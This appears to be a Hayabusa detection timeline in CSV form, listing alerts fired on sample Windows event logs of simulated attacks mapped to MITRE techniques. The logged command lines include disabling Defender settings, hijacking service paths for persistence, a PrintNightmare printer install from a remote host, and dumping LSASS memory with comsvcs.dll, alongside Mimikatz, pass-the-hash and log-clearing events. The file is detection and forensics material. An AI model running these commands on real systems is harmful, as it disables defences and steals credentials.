2021-08-23 04:33:52.344 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=344B09330D8CC196728BC4320194FE49993D3A2C,MD5=B3FF2F3D0040F23F36E9F2A3444F42EA,SHA256=3A8DAE539BB91C950CCD6EA244D5C09CDF44AEBC8EE4FF9C5094D5195F40E82A,IMPHASH=44C3854843F7A3FCCDF8DDBBEA66F302",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.350 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=344B09330D8CC196728BC4320194FE49993D3A2C,MD5=B3FF2F3D0040F23F36E9F2A3444F42EA,SHA256=3A8DAE539BB91C950CCD6EA244D5C09CDF44AEBC8EE4FF9C5094D5195F40E82A,IMPHASH=44C3854843F7A3FCCDF8DDBBEA66F302",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.355 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\msvcp140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=6648A614B14F15ECB522A6D2BDF5E5031417742F,MD5=5BEB853A59982A96052364AB7BDE8D20,SHA256=CEACFE080276ACDF3FF731A8CA68140BCF589CEB1E3DD7544E0D4765E0489D9E,IMPHASH=4F1912F58F8D1AE7998EF5303198D62D",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.513 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\OneDriveTelemetryStable.dll | Process: 
C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=8D3D5F03E129C08F890847F7B12E620F9315B396,MD5=B01D2385E32F4251399C7EDCE8364967,SHA256=5E6CC575BEC320E4502B48B1050FE255BF6504013FAA6EE62A80707E3092383E,IMPHASH=C719A37B3234505BC0AADBB7DE7C9654",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.545 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileSyncTelemetryExtensions.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=B535176F0E42CE3DEE9F650070AB1CAEA840CFBF,MD5=68E4FB636BC56B74BF54F18223238862,SHA256=1084C4AF96A06F8A84CA279C659394ACB1BC80D1F5DBC16EB62964C5632C41A0,IMPHASH=D207E97F105829D9C63E79F98B136D2B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-08-23 04:33:52.931 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuthLib64.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: 
SHA1=FFFD189CF1234EC54392F57C8D6D683A92DEB2B4,MD5=5E3A74A8E0295B1396C1A5D5D5C0664F,SHA256=E0132392E8014B120BBF51F2E98E9BB329877666A7D005353A4E96DF14DFFD4C,IMPHASH=592278570E604A14992850A5B210142D",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx 2021-10-02 02:30:39.083 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: at 13:20 /interactive cmd | Path: C:\Windows\System32\at.exe | PID: 0x15cc | User: admmig | LID: 0x65b0f5db,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-Interactive shell using AT schedule task.evtx 2021-10-06 18:46:09.533 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -command ""Set-MpPreference -EnableControlledFolderAccess Disabled"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x242c | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx 2021-10-06 18:46:13.168 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -command ""Set-MpPreference -PUAProtection disable"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x21f4 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx 2021-10-06 
18:46:28.683 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1bcc | User: WIN10-02$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx 2021-10-07 23:52:54.848 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: REG ADD ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time"" /v FailureCommand /t REG_SZ /d ""C:\tmp\pentestlab.exe"" | Path: C:\Windows\System32\reg.exe | PID: 0x2a58 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with Failure Command.evtx 2021-10-07 23:53:02.147 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc failure W32Time command= ""\""c:\Windows\system32\pentestlab.exe\"""" | Path: C:\Windows\System32\sc.exe | PID: 0xa00 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with Failure Command.evtx 2021-10-08 00:36:23.429 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc config xboxgip binPath= ""C:\windows\system32\pentestlab.exe"" | Path: C:\Windows\System32\sc.exe | PID: 0x29cc | User: admmig | LID: 
0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with malicious path.evtx 2021-10-08 00:36:24.892 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\xboxgip"" /v ImagePath /t REG_SZ /d ""C:\tmp\pentestlab.exe"" | Path: C:\Windows\System32\reg.exe | PID: 0x11b8 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with malicious path.evtx 2021-10-08 17:53:42.131 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc sdset xboxgip ""D:(A;;CCLCSWRPWPDTLOCRRC;;;SY) | Path: C:\Windows\System32\sc.exe | PID: 0x1d28 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (sc).evtx 2021-10-08 19:05:29.432 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\XblGameSave\Security"" /v Security /t REG_BINARY /d fe340ead | Path: C:\Windows\System32\reg.exe | PID: 0x18c4 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (registry).evtx 2021-10-08 19:05:36.298 
+09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2af0 | User: WIN10-02$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (registry).evtx 2021-10-08 21:56:58.803 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" 2021-10-08 21:57:04.504 +09:00,fs01.offsec.lan,4688,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" 2021-10-08 21:57:06.763 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: admmig | Target User: gentilguest | IP Address: 20.188.56.147 | Process: | Target Server: printnightmare.gentilkiwi.com,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" 2021-10-08 21:57:06.763 +09:00,fs01.offsec.lan,4648,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" 2021-10-08 21:57:06.869 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: rundll32 
printui.dll,PrintUIEntry /in /n""\\printnightmare.gentilkiwi.com\Kiwi Legit Printer"" | Path: C:\Windows\System32\rundll32.exe | PID: 0x1670 | User: admmig | LID: 0x65b0f5db",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" 2021-10-08 21:57:06.869 +09:00,fs01.offsec.lan,4688,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" 2021-10-08 21:57:18.646 +09:00,fs01.offsec.lan,6416,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" 2021-10-08 21:57:19.072 +09:00,fs01.offsec.lan,6416,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx" 2021-10-19 23:33:13.262 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1201-Password Policy Discovery/ID4688-Password policy discovery via commandline.evtx 2021-10-19 23:40:28.001 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4688-Group discovery via commandline.evtx 2021-10-19 23:42:41.234 
+09:00,FS03.offsec.lan,4720,low,Persis,Local User Account Created,User: toto3 | SID: S-1-5-21-3410678313-1251427014-1131291384-1004,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx 2021-10-19 23:44:30.780 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID4688-Network share discovery or connection via commandline.evtx 2021-10-19 23:45:16.394 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-Network share manipulation via commandline.evtx 2021-10-20 18:18:07.101 +09:00,FS03.offsec.lan,11,medium,,File Created_Sysmon Alert,T1003 | Path: C:\Windows\System32\mimilsa.log | Process: C:\Windows\system32\lsass.exe | PID: 512 | PGUID: 7CF65FC7-6649-6165-0B00-000000001200,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-Mimikatz LSA SSP clear text password exfiltration.evtx 2021-10-20 18:18:07.101 +09:00,FS03.offsec.lan,11,critical,CredAccess,Mimikatz MemSSP Default Log File Creation,,rules/sigma/file_event/file_event_mimimaktz_memssp_log_file.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-Mimikatz LSA SSP clear text password exfiltration.evtx 2021-10-20 22:39:12.731 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: 
admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx 2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,info,,Logon Type 9 - NewCredentials,User: admmig | Computer: - | IP Addr: ::1 | LID: 0x266e045 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx 2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x266e045,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx 2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx 2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,high,LatMov,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx 2021-10-20 22:39:21.730 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x262bb6b,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication 
Material/ID4624-Mimikatz Pass the hash.evtx
2021-10-20 23:18:43.326 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:43.326 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: OFFSEC\admmig | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x269eec8 | PID: 2508 | PGUID: 7CF65FC7-254F-6170-9402-000000001200 | Hash: SHA1=9F1E24917EF96BBB339F4E2A226ACAFD1009F47B,MD5=C031E215B8B08C752BF362F6D4C5D3AD,SHA256=840E1F9DC5A29BEBF01626822D7390251E9CF05BB3560BA7B68BDB8A41CF08E3,IMPHASH=099B747A4A31983374E54912D4BB7C44",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/proc_creation_win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,CredAccess,LSASS Memory Dumping,,rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,CredAccess,PowerShell Get-Process LSASS,,rules/sigma/process_creation/proc_creation_win_susp_powershell_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.855 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2508 | PGUID: 7CF65FC7-254F-6170-9402-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.871 +09:00,FS03.offsec.lan,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Image: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\3e50931f5376ebab490b124f3f46dd45\System.Management.Automation.ni.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: false | Signature: Unavailable | PID: 2508 | PGUID: 7CF65FC7-254F-6170-9402-000000001200 | Hash: SHA1=BFDFC46117000B652897F1DE8084FBB9EAA66384,MD5=6EF679145F15A8E54FBF9B23A25A6F21,SHA256=240674945FF5175A14E5DF6DEB2AECD04231911DE9103CA34F6D327C4FF86732,IMPHASH=00000000000000000000000000000000",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: ""C:\Windows\System32\rundll32.exe"" C:\Windows\System32\comsvcs.dll MiniDump 512 \Windows\Temp\76nivOxA.dmp full | Process: C:\Windows\System32\rundll32.exe | User: OFFSEC\admmig | Parent Cmd: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id"" | LID: 0x269eec8 | PID: 2860 | PGUID: 7CF65FC7-2550-6170-9602-000000001200 | Hash: SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,high,Evas | CredAccess,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/proc_creation_win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,11,info,,File Created,Path: C:\Windows\Temp\76nivOxA.dmp | Process: C:\Windows\System32\rundll32.exe | PID: 2860 | PGUID: 7CF65FC7-2550-6170-9602-000000001200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,critical,CredAccess,Lsass Memory Dump via Comsvcs DLL,,rules/sigma/process_access/sysmon_lsass_dump_comsvcs_dll.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
